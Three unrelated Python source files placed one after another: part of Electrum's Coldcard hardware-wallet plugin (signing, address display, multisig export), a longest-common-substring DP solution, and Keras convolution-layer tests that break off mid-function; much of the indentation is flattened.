def sign_message_start(self, path, msg):
# this starts the UX experience.
self.dev.send_recv(CCProtocolPacker.sign_message(msg, path), timeout=None)
@runs_in_hwd_thread
def sign_message_poll(self):
# poll device... if user has approved, will get tuple: (addr, sig) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_msg(), timeout=None)
@runs_in_hwd_thread
def sign_transaction_start(self, raw_psbt: bytes, *, finalize: bool = False):
# Multiple steps to sign:
# - upload binary
# - start signing UX
# - wait for coldcard to complete process, or have it refused.
# - download resulting txn
assert 20 <= len(raw_psbt) < MAX_TXN_LEN, 'PSBT is too big'
dlen, chk = self.dev.upload_file(raw_psbt)
resp = self.dev.send_recv(CCProtocolPacker.sign_transaction(dlen, chk, finalize=finalize),
timeout=None)
        if resp is not None:
            raise ValueError(resp)
@runs_in_hwd_thread
def sign_transaction_poll(self):
        # poll device... if user has approved, will get tuple: (length, checksum) else None
return self.dev.send_recv(CCProtocolPacker.get_signed_txn(), timeout=None)
@runs_in_hwd_thread
def download_file(self, length, checksum, file_number=1):
# get a file
return self.dev.download_file(length, checksum, file_number=file_number)
class Coldcard_KeyStore(Hardware_KeyStore):
hw_type = 'coldcard'
device = 'Coldcard'
plugin: 'ColdcardPlugin'
def __init__(self, d):
Hardware_KeyStore.__init__(self, d)
# Errors and other user interaction is done through the wallet's
# handler. The handler is per-window and preserved across
# device reconnects
self.force_watching_only = False
self.ux_busy = False
# we need to know at least the fingerprint of the master xpub to verify against MiTM
        # - device reports these values during the encryption setup process
# - full xpub value now optional
self.ckcc_xpub = d.get('ckcc_xpub', None)
def dump(self):
# our additions to the stored data about keystore -- only during creation?
d = Hardware_KeyStore.dump(self)
d['ckcc_xpub'] = self.ckcc_xpub
return d
def get_xfp_int(self) -> int:
xfp = self.get_root_fingerprint()
assert xfp is not None
return xfp_int_from_xfp_bytes(bfh(xfp))
def get_client(self):
        # called when user tries to do something like view address, sign something.
# - not called during probing/setup
# - will fail if indicated device can't produce the xpub (at derivation) expected
rv = self.plugin.get_client(self)
if rv:
xfp_int = self.get_xfp_int()
rv.verify_connection(xfp_int, self.ckcc_xpub)
return rv
def give_error(self, message, clear_client=False):
self.logger.info(message)
if not self.ux_busy:
self.handler.show_error(message)
else:
self.ux_busy = False
if clear_client:
self.client = None
raise UserFacingException(message)
def wrap_busy(func):
# decorator: function takes over the UX on the device.
def wrapper(self, *args, **kwargs):
try:
self.ux_busy = True
return func(self, *args, **kwargs)
finally:
self.ux_busy = False
return wrapper
def decrypt_message(self, pubkey, message, password):
raise UserFacingException(_('Encryption and decryption are currently not supported for {}').format(self.device))
@wrap_busy
def sign_message(self, sequence, message, password):
        # Sign a message on device. Since we have a big screen, of course we
        # have to show the message unambiguously there first!
try:
msg = message.encode('ascii', errors='strict')
assert 1 <= len(msg) <= MSG_SIGNING_MAX_LENGTH
except (UnicodeError, AssertionError):
# there are other restrictions on message content,
# but let the device enforce and report those
self.handler.show_error('Only short (%d max) ASCII messages can be signed.'
% MSG_SIGNING_MAX_LENGTH)
return b''
path = self.get_derivation_prefix() + ("/%d/%d" % sequence)
try:
cl = self.get_client()
try:
self.handler.show_message("Signing message (using %s)..." % path)
cl.sign_message_start(path, msg)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = cl.sign_message_poll()
if resp is not None:
break
finally:
self.handler.finished()
assert len(resp) == 2
addr, raw_sig = resp
# already encoded in Bitcoin fashion, binary.
assert 40 < len(raw_sig) <= 65
return raw_sig
except (CCUserRefused, CCBusyError) as exc:
self.handler.show_error(str(exc))
except CCProtoError as exc:
            self.logger.exception('Error signing message')
            self.handler.show_error('{}\n\n{}'.format(
                _('Error signing message') + ':', str(exc)))
except Exception as e:
self.give_error(e, True)
# give empty bytes for error cases; it seems to clear the old signature box
return b''
@wrap_busy
def sign_transaction(self, tx, password):
# Upload PSBT for signing.
# - we can also work offline (without paired device present)
if tx.is_complete():
return
client = self.get_client()
assert client.dev.master_fingerprint == self.get_xfp_int()
raw_psbt = tx.serialize_as_bytes()
try:
try:
self.handler.show_message("Authorize Transaction...")
client.sign_transaction_start(raw_psbt)
while 1:
# How to kill some time, without locking UI?
time.sleep(0.250)
resp = client.sign_transaction_poll()
if resp is not None:
break
rlen, rsha = resp
# download the resulting txn.
raw_resp = client.download_file(rlen, rsha)
finally:
self.handler.finished()
except (CCUserRefused, CCBusyError) as exc:
self.logger.info(f'Did not sign: {exc}')
self.handler.show_error(str(exc))
return
except BaseException as e:
self.logger.exception('')
self.give_error(e, True)
return
tx2 = PartialTransaction.from_raw_psbt(raw_resp)
# apply partial signatures back into txn
tx.combine_with_other_psbt(tx2)
# caller's logic looks at tx now and if it's sufficiently signed,
# will send it if that's the user's intent.
@staticmethod
def _encode_txin_type(txin_type):
# Map from Electrum code names to our code numbers.
return {'standard': AF_CLASSIC, 'p2pkh': AF_CLASSIC,
'p2sh': AF_P2SH,
'p2wpkh-p2sh': AF_P2WPKH_P2SH,
'p2wpkh': AF_P2WPKH,
'p2wsh-p2sh': AF_P2WSH_P2SH,
'p2wsh': AF_P2WSH,
}[txin_type]
@wrap_busy
def show_address(self, sequence, txin_type):
client = self.get_client()
address_path = self.get_derivation_prefix()[2:] + "/%d/%d"%sequence
addr_fmt = self._encode_txin_type(txin_type)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_address(address_path, addr_fmt)
# we could double check address here
finally:
self.handler.finished()
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}\n\n{}'.format(
_('Error showing address') + ':', str(exc)))
except BaseException as exc:
self.logger.exception('')
self.handler.show_error(exc)
@wrap_busy
def show_p2sh_address(self, M, script, xfp_paths, txin_type):
client = self.get_client()
addr_fmt = self._encode_txin_type(txin_type)
try:
try:
self.handler.show_message(_("Showing address ..."))
dev_addr = client.show_p2sh_address(M, xfp_paths, script, addr_fmt=addr_fmt)
# we could double check address here
finally:
self.handler.finished()
except CCProtoError as exc:
self.logger.exception('Error showing address')
self.handler.show_error('{}.\n{}\n\n{}'.format(
_('Error showing address'),
_('Make sure you have imported the correct wallet description '
'file on the device for this multisig wallet.'),
str(exc)))
except BaseException as exc:
self.logger.exception('')
self.handler.show_error(exc)
class ColdcardPlugin(HW_PluginBase):
keystore_class = Coldcard_KeyStore
minimum_library = (0, 7, 7)
DEVICE_IDS = [
(COINKITE_VID, CKCC_PID),
(COINKITE_VID, CKCC_SIMULATED_PID)
]
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_devices(self.DEVICE_IDS, plugin=self)
self.device_manager().register_enumerate_func(self.detect_simulator)
def get_library_version(self):
import ckcc
try:
version = ckcc.__version__
except AttributeError:
version = 'unknown'
if requirements_ok:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def detect_simulator(self):
# if there is a simulator running on this machine,
# return details about it so it's offered as a pairing choice
fn = CKCC_SIMULATOR_PATH
if os.path.exists(fn):
return [Device(path=fn,
interface_number=-1,
id_=fn,
product_key=(COINKITE_VID, CKCC_SIMULATED_PID),
usage_page=0,
transport_ui_string='simulator')]
return []
@runs_in_hwd_thread
def create_client(self, device, handler):
if handler:
self.handler = handler
        # We are given a HID device, or at least some details about it.
        # Not sure why we aren't just given a HID library handle, but
        # the 'path' is unambiguous, so we'll use that.
try:
rv = CKCCClient(self, handler, device.path,
is_simulator=(device.product_key[1] == CKCC_SIMULATED_PID))
return rv
except Exception as e:
self.logger.exception('late failure connecting to device?')
return None
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
# this seems to be part of the pairing process only, not during normal ops?
# base_wizard:on_hw_derivation
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
client.ping_check()
xpub = client.get_xpub(derivation, xtype)
return xpub
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['CKCCClient']:
# Acquire a connection to the hardware device (via USB)
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
if client is not None:
client.ping_check()
return client
@staticmethod
def export_ms_wallet(wallet: Multisig_Wallet, fp, name):
# Build the text file Coldcard needs to understand the multisig wallet
# it is participating in. All involved Coldcards can share same file.
assert isinstance(wallet, Multisig_Wallet)
print('# Exported from Electrum', file=fp)
print(f'Name: {name:.20s}', file=fp)
print(f'Policy: {wallet.m} of {wallet.n}', file=fp)
print(f'Format: {wallet.txin_type.upper()}', file=fp)
xpubs = []
for xpub, ks in zip(wallet.get_master_public_keys(), wallet.get_keystores()): # type: str, KeyStoreWithMPK
fp_bytes, der_full = ks.get_fp_and_derivation_to_be_used_in_partial_tx(der_suffix=[], only_der_suffix=False)
fp_hex = fp_bytes.hex().upper()
der_prefix_str = bip32.convert_bip32_intpath_to_strpath(der_full)
xpubs.append((fp_hex, xpub, der_prefix_str))
# Before v3.2.1 derivation didn't matter too much to the Coldcard, since it
# could use key path data from PSBT or USB request as needed. However,
# derivation data is now required.
print('', file=fp)
assert len(xpubs) == wallet.n
for xfp, xpub, der_prefix in xpubs:
print(f'Derivation: {der_prefix}', file=fp)
print(f'{xfp}: {xpub}\n', file=fp)
def show_address(self, wallet, address, keystore: 'Coldcard_KeyStore' = None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
txin_type = wallet.get_txin_type(address)
# Standard_Wallet => not multisig, must be bip32
if type(wallet) is Standard_Wallet:
sequence = wallet.get_address_index(address)
keystore.show_address(sequence, txin_type)
elif type(wallet) is Multisig_Wallet:
assert isinstance(wallet, Multisig_Wallet) # only here for type-hints in IDE
# More involved for P2SH/P2WSH addresses: need M, and all public keys, and their
# derivation paths. Must construct script, and track fingerprints+paths for
# all those keys
pubkey_deriv_info = wallet.get_public_keys_with_deriv_info(address)
pubkey_hexes = sorted([pk.hex() for pk in list(pubkey_deriv_info)])
xfp_paths = []
for pubkey_hex in pubkey_hexes:
pubkey = bytes.fromhex(pubkey_hex)
ks, der_suffix = pubkey_deriv_info[pubkey]
fp_bytes, der_full = ks.get_fp_and_derivation_to_be_used_in_partial_tx(der_suffix, only_der_suffix=False)
xfp_int = xfp_int_from_xfp_bytes(fp_bytes)
xfp_paths.append([xfp_int] + list(der_full))
script = bfh(wallet.pubkeys_to_scriptcode(pubkey_hexes))
keystore.show_p2sh_address(wallet.m, script, xfp_paths, txin_type)
else:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
def xfp_int_from_xfp_bytes(fp_bytes: bytes) -> int:
return int.from_bytes(fp_bytes, byteorder="little", signed=False)
def xfp2str(xfp: int) -> str:
# Standardized way to show an xpub's fingerprint... it's a 4-byte string
# and not really an integer. Used to show as '0x%08x' but that's wrong endian.
return struct.pack('<I', xfp).hex().lower()
# EOF
|
# problem - https://practice.geeksforgeeks.org/problems/longest-common-substring1452/1
class Solution:
    def longestCommonSubstr(self, S1, S2, n, m):
        # Classic DP: dp[i][j] holds the length of the longest common suffix of
        # S1[:i] and S2[:j]; the answer is the maximum over all cells.
        res = 0
        rows, cols = n + 1, m + 1
        dp = [[0] * cols for _ in range(rows)]
        for i in range(1, rows):
            for j in range(1, cols):
                if S1[i - 1] == S2[j - 1]:
                    dp[i][j] = dp[i - 1][j - 1] + 1
                    res = max(res, dp[i][j])
                else:
                    dp[i][j] = 0
        return res
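# Minimal usage sketch (driver code is not part of the original submission):
# "ABCDGH" and "ACDGHR" share the substring "CDGH", so the expected answer is 4.
if __name__ == '__main__':
    s1, s2 = "ABCDGH", "ACDGHR"
    print(Solution().longestCommonSubstr(s1, s2, len(s1), len(s2)))  # -> 4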
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for convolutional layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
@keras_parameterized.run_all_keras_modes
class Conv1DTest(keras_parameterized.TestCase):
def _run_test(self, kwargs, expected_output_shape):
num_samples = 2
stack_size = 3
length = 7
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Conv1D,
kwargs=kwargs,
input_shape=(num_samples, length, stack_size),
expected_output_shape=expected_output_shape)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'}, (None, 5, 2)),
('padding_same', {'padding': 'same'}, (None, 7, 2)),
('padding_same_dilation_2', {'padding': 'same', 'dilation_rate': 2},
(None, 7, 2)),
('padding_same_dilation_3', {'padding': 'same', 'dilation_rate': 3},
(None, 7, 2)),
('padding_causal', {'padding': 'causal'}, (None, 7, 2)),
('strides', {'strides': 2}, (None, 3, 2)),
('dilation_rate', {'dilation_rate': 2}, (None, 3, 2)),
)
def test_conv1d(self, kwargs, expected_output_shape):
kwargs['filters'] = 2
kwargs['kernel_size'] = 3
self._run_test(kwargs, expected_output_shape)
def test_conv1d_regularizers(self):
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_regularizer': 'l2',
'bias_regularizer': 'l2',
'activity_regularizer': 'l2',
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv1D(**kwargs)
layer.build((None, 5, 2))
self.assertEqual(len(layer.losses), 2)
layer(keras.backend.variable(np.ones((1, 5, 2))))
self.assertEqual(len(layer.losses), 3)
def test_conv1d_constraints(self):
k_constraint = lambda x: x
b_constraint = lambda x: x
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_constraint': k_constraint,
'bias_constraint': b_constraint,
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv1D(**kwargs)
layer.build((None, 5, 2))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
@keras_parameterized.run_all_keras_modes
class Conv2DTest(keras_parameterized.TestCase):
def _run_test(self, kwargs, expected_output_shape):
num_samples = 2
stack_size = 3
num_row = 7
num_col = 6
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Conv2D,
kwargs=kwargs,
input_shape=(num_samples, num_row, num_col, stack_size),
expected_output_shape=expected_output_shape)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'}, (None, 5, 4, 2)),
('padding_same', {'padding': 'same'}, (None, 7, 6, 2)),
('padding_same_dilation_2', {'padding': 'same', 'dilation_rate': 2},
(None, 7, 6, 2)),
('strides', {'strides': (2, 2)}, (None, 3, 2, 2)),
('dilation_rate', {'dilation_rate': (2, 2)}, (None, 3, 2, 2)),
# Only runs on GPU with CUDA, channels_first is not supported on CPU.
# TODO(b/62340061): Support channels_first on CPU.
('data_format', {'data_format': 'channels_first'}),
)
def test_conv2d(self, kwargs, expected_output_shape=None):
kwargs['filters'] = 2
kwargs['kernel_size'] = (3, 3)
if 'data_format' not in kwargs or test.is_gpu_available(cuda_only=True):
self._run_test(kwargs, expected_output_shape)
def test_conv2d_regularizers(self):
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_regularizer': 'l2',
'bias_regularizer': 'l2',
'activity_regularizer': 'l2',
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv2D(**kwargs)
layer.build((None, 5, 5, 2))
self.assertEqual(len(layer.losses), 2)
layer(keras.backend.variable(np.ones((1, 5, 5, 2))))
self.assertEqual(len(layer.losses), 3)
def test_conv2d_constraints(self):
k_constraint = lambda x: x
b_constraint = lambda x: x
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_constraint': k_constraint,
'bias_constraint': b_constraint,
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv2D(**kwargs)
layer.build((None, 5, 5, 2))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
@keras_parameterized.run_all_keras_modes
class Conv3DTest(keras_parameterized.TestCase):
def _run_test(self, kwargs, expected_output_shape):
num_samples = 2
stack_size = 3
num_row = 7
num_col = 6
depth = 5
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Conv3D,
kwargs=kwargs,
input_shape=(num_samples, depth, num_row, num_col, stack_size),
expected_output_shape=expected_output_shape)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'}, (None, 3, 5, 4, 2)),
('padding_same', {'padding': 'same'}, (None, 5, 7, 6, 2)),
('strides', {'strides': (2, 2, 2)}, (None, 2, 3, 2, 2)),
('dilation_rate', {'dilation_rate': (2, 2, 2)}, (None, 1, 3, 2, 2)),
# Only runs on GPU with CUDA, channels_first is not supported on CPU.
# TODO(b/62340061): Support channels_first on CPU.
('data_format', {'data_format': 'channels_first'}),
)
def test_conv3d(self, kwargs, expected_output_shape=None):
kwargs['filters'] = 2
kwargs['kernel_size'] = (3, 3, 3)
if 'data_format' not in kwargs or test.is_gpu_available(cuda_only=True):
self._run_test(kwargs, expected_output_shape)
def test_conv3d_regularizers(self):
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_regularizer': 'l2',
'bias_regularizer': 'l2',
'activity_regularizer': 'l2',
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv3D(**kwargs)
layer.build((None, 5, 5, 5, 2))
      self.assertEqual(len(layer.losses), 2)
layer(keras.backend.variable(np.ones((1, 5, 5, 5, 2))))
self.assertEqual(len(layer.losses), 3)
def test_conv3d_constraints(self):
k_constraint = lambda x: x
b_constraint = lambda x: x
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_constraint': k_constraint,
'bias_constraint': b_constraint,
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv3D(**kwargs)
layer.build((None, 5, 5, 5, 2))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
def test_conv3d_dynamic_shape(self):
input_data = np.random.random((1, 3, 3, 3, 3)).astype(np.float32)
with self.cached_session(use_gpu=True):
# Won't raise error here.
testing_utils.layer_test(
keras.layers.Conv3D,
kwargs={
'data_format': 'channels_last',
'filters': 3,
'kernel_size': 3
},
input_shape=(None, None, None, None, 3),
input_data=input_data)
if test.is_gpu_available(cuda_only=True):
testing_utils.layer_test(
keras.layers.Conv3D,
kwargs={
'data_format': 'channels_first',
'filters': 3,
'kernel_size': 3
},
input_shape=(None, 3, None, None, None),
input_data=input_data)
@keras_parameterized.run_all_keras_modes
class ConvSequentialTest(keras_parameterized.TestCase):
def _run_test(self, conv_layer_cls, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2):
kwargs['filters'] = 1
kwargs['kernel_size'] = 3
kwargs['dilation_rate'] = 2
with self.cached_session(use_gpu=True):
layer = conv_layer_cls(**kwargs)
output1 = layer(np.zeros(input_shape1))
self.assertEqual(output1.shape, expected_output_shape1)
output2 = layer(np.zeros(input_shape2))
self.assertEqual(output2.shape, expected_output_shape2)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'},
(1, 8, 2), (1, 5, 2), (1, 4, 1), (1, 1, 1)),
('padding_same', {'padding': 'same'},
(1, 8, 2), (1, 5, 2), (1, 8, 1), (1, 5, 1)),
('padding_causal', {'padding': 'causal'},
(1, 8, 2), (1, 5, 2), (1, 8, 1), (1, 5, 1)),
)
def test_conv1d(self, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2):
self._run_test(keras.layers.Conv1D, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'},
(1, 7, 6, 2), (1, 6, 5, 2), (1, 3, 2, 1), (1, 2, 1, 1)),
('padding_same', {'padding': 'same'},
(1, 7, 6, 2), (1, 6, 5, 2), (1, 7, 6, 1), (1, 6, 5, 1)),
)
def test_conv2d(self, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2):
self._run_test(keras.layers.Conv2D, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'},
(1, 5, 7, 6, 2), (1, 8, 6, 5, 2), (1, 1, 3, 2, 1), (1, 4, 2, 1, 1)),
('padding_same', {'padding': 'same'},
(1, 5, 7, 6, 2), (1, 8, 6, 5, 2), (1, 5, 7, 6, 1), (1, 8, 6, 5, 1)),
)
def test_conv3d(self, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2):
self._run_test(keras.layers.Conv3D, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2)
@keras_parameterized.run_all_keras_modes
class ZeroPaddingTest(keras_parameterized.TestCase):
def test_zero_padding_1d(self):
num_samples = 2
input_dim = 2
num_steps = 5
shape = (num_samples, num_steps, input_dim)
inputs = np.ones(shape)
with self.cached_session(use_gpu=True):
# basic test
testing_utils.layer_test(
keras.layers.ZeroPadding1D,
kwargs={'padding': 2},
input_shape=inputs.shape)
testing_utils.layer_test(
keras.layers.ZeroPadding1D,
kwargs={'padding': (1, 2)},
input_shape=inputs.shape)
# correctness test
layer = keras.layers.ZeroPadding1D(padding=2)
layer.build(shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
for offset in [0, 1, -1, -2]:
np.testing.assert_allclose(np_output[:, offset, :], 0.)
np.testing.assert_allclose(np_output[:, 2:-2, :], 1.)
layer = keras.layers.ZeroPadding1D(padding=(1, 2))
layer.build(shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
for left_offset in [0]:
np.testing.assert_allclose(np_output[:, left_offset, :], 0.)
for right_offset in [-1, -2]:
np.testing.assert_allclose(np_output[:, right_offset, :], 0.)
np.testing.assert_allclose(np_output[:, 1:-2, :], 1.)
layer.get_config()
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.ZeroPadding1D(padding=(1, 1, 1))
with self.assertRaises(ValueError):
keras.layers.ZeroPadding1D(padding=None)
def test_zero_padding_2d(self):
num_samples = 2
stack_size = 2
input_num_row = 4
input_num_col = 5
for data_format in ['channels_first', 'channels_last']:
      if data_format == 'channels_first':
        inputs = np.ones((num_samples, stack_size, input_num_row, input_num_col))
      else:
        inputs = np.ones((num_samples, input_num_row, input_num_col, stack_size))
# basic test
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.ZeroPadding2D,
kwargs={'padding': (2, 2),
'data_format': data_format},
input_shape=inputs.shape)
testing_utils.layer_test(
keras.layers.ZeroPadding2D,
kwargs={'padding': ((1, 2), (3, 4)),
'data_format': data_format},
input_shape=inputs.shape)
# correctness test
with self.cached_session(use_gpu=True):
layer = keras.layers.ZeroPadding2D(
padding=(2, 2), data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
if data_format == 'channels_last':
for offset in [0, 1, -1, -2]:
np.testing.assert_allclose(np_output[:, offset, :, :], 0.)
np.testing.assert_allclose(np_output[:, :, offset, :], 0.)
np.testing.assert_allclose(np_output[:, 2:-2, 2:-2, :], 1.)
elif data_format == 'channels_first':
for offset in [0, 1, -1, -2]:
np.testing.assert_allclose(np_output[:, :, offset, :], 0.)
np.testing.assert_allclose(np_output[:, :, :, offset], 0.)
          np.testing.assert_allclose(np_output[:, :, 2:-2, 2:-2], 1.)
layer = keras.layers.ZeroPadding2D(
padding=((1, 2), (3, 4)), data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
if data_format == 'channels_last':
for top_offset in [0]:
np.testing.assert_allclose(np_output[:, top_offset, :, :], 0.)
for bottom_offset in [-1, -2]:
np.testing.assert_allclose(np_output[:, bottom_offset, :, :], 0.)
for left_offset in [0, 1, 2]:
np.testing.assert_allclose(np_output[:, :, left_offset, :], 0.)
for right_offset in [-1, -2, -3, -4]:
np.testing.assert_allclose(np_output[:, :, right_offset, :], 0.)
np.testing.assert_allclose(np_output[:, 1:-2, 3:-4, :], 1.)
elif data_format == 'channels_first':
for top_offset in [0]:
np.testing.assert_allclose(np_output[:, :, top_offset, :], 0.)
for bottom_offset in [-1, -2]:
np.testing.assert_allclose(np_output[:, :, bottom_offset, :], 0.)
for left_offset in [0, 1, 2]:
np.testing.assert_allclose(np_output[:, :, :, left_offset], 0.)
for right_offset in [-1, -2, -3, -4]:
np.testing.assert_allclose(np_output[:, :, :, right_offset], 0.)
np.testing.assert_allclose(np_output[:, :, 1:-2, 3:-4], 1.)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.ZeroPadding2D(padding=(1, 1, 1))
with self.assertRaises(ValueError):
keras.layers.ZeroPadding2D(padding=None)
def test_zero_padding_3d(self):
num_samples = 2
stack_size = 2
input_len_dim1 = 4
input_len_dim2 = 5
input_len_dim3 = 3
inputs = np.ones((num_samples, input_len_dim1, input_len_dim2,
input_len_dim3, stack_size))
with self.cached_session(use_gpu=True):
# basic test
testing_utils.layer_test(
keras.layers.ZeroPadding3D,
kwargs={'padding': (2, 2, 2)},
input_shape=inputs.shape)
# correctness test
layer = keras.layers.ZeroPadding3D(padding=(2, 2, 2))
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
for offset in [0, 1, -1, -2]:
np.testing.assert_allclose(np_output[:, offset, :, :, :], 0.)
np.testing.assert_allclose(np_output[:, :, offset, :, :], 0.)
np.testing.assert_allclose(np_output[:, :, :, offset, :], 0.)
np.testing.assert_allclose(np_output[:, 2:-2, 2:-2, 2:-2, :], 1.)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.ZeroPadding3D(padding=(1, 1))
with self.assertRaises(ValueError):
keras.layers.ZeroPadding3D(padding=None)
@test_util.for_all_test_methods(test_util.disable_xla,
'align_corners=False not supported by XLA')
@keras_parameterized.run_all_keras_modes
class UpSamplingTest(keras_parameterized.TestCase):
def test_upsampling_1d(self):
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.UpSampling1D, kwargs={'size': 2}, input_shape=(3, 5, 4))
def test_upsampling_2d(self):
num_samples = 2
stack_size = 2
input_num_row = 11
input_num_col = 12
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_num_row,
input_num_col)
else:
inputs = np.random.rand(num_samples, input_num_row, input_num_col,
stack_size)
# basic test
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.UpSampling2D,
kwargs={'size': (2, 2),
'data_format': data_format},
input_shape=inputs.shape)
for length_row in [2]:
for length_col in [2, 3]:
layer = keras.layers.UpSampling2D(
size=(length_row, length_col), data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
if data_format == 'channels_first':
assert np_output.shape[2] == length_row * input_num_row
assert np_output.shape[3] == length_col * input_num_col
else: # tf
assert np_output.shape[1] == length_row * input_num_row
assert np_output.shape[2] == length_col * input_num_col
# compare with numpy
if data_format == 'channels_first':
expected_out = np.repeat(inputs, length_row, axis=2)
expected_out = np.repeat(expected_out, length_col, axis=3)
else: # tf
expected_out = np.repeat(inputs, length_row, axis=1)
expected_out = np.repeat(expected_out, length_col, axis=2)
np.testing.assert_allclose(np_output, expected_out)
def test_upsampling_2d_bilinear(self):
num_samples = 2
stack_size = 2
input_num_row = 11
input_num_col = 12
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_num_row,
input_num_col)
else:
inputs = np.random.rand(num_samples, input_num_row, input_num_col,
stack_size)
testing_utils.layer_test(keras.layers.UpSampling2D,
kwargs={'size': (2, 2),
'data_format': data_format,
'interpolation': 'bilinear'},
input_shape=inputs.shape)
if not context.executing_eagerly():
for length_row in [2]:
for length_col in [2, 3]:
layer = keras.layers.UpSampling2D(
size=(length_row, length_col),
data_format=data_format)
layer.build(inputs.shape)
outputs = layer(keras.backend.variable(inputs))
np_output = keras.backend.eval(outputs)
if data_format == 'channels_first':
self.assertEqual(np_output.shape[2], length_row * input_num_row)
self.assertEqual(np_output.shape[3], length_col * input_num_col)
else:
self.assertEqual(np_output.shape[1], length_row * input_num_row)
self.assertEqual(np_output.shape[2], length_col * input_num_col)
def test_upsampling_3d(self):
num_samples = 2
stack_size = 2
input_len_dim1 = 10
input_len_dim2 = 11
input_len_dim3 = 12
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_len_dim1,
input_len_dim2, input_len_dim3)
else:
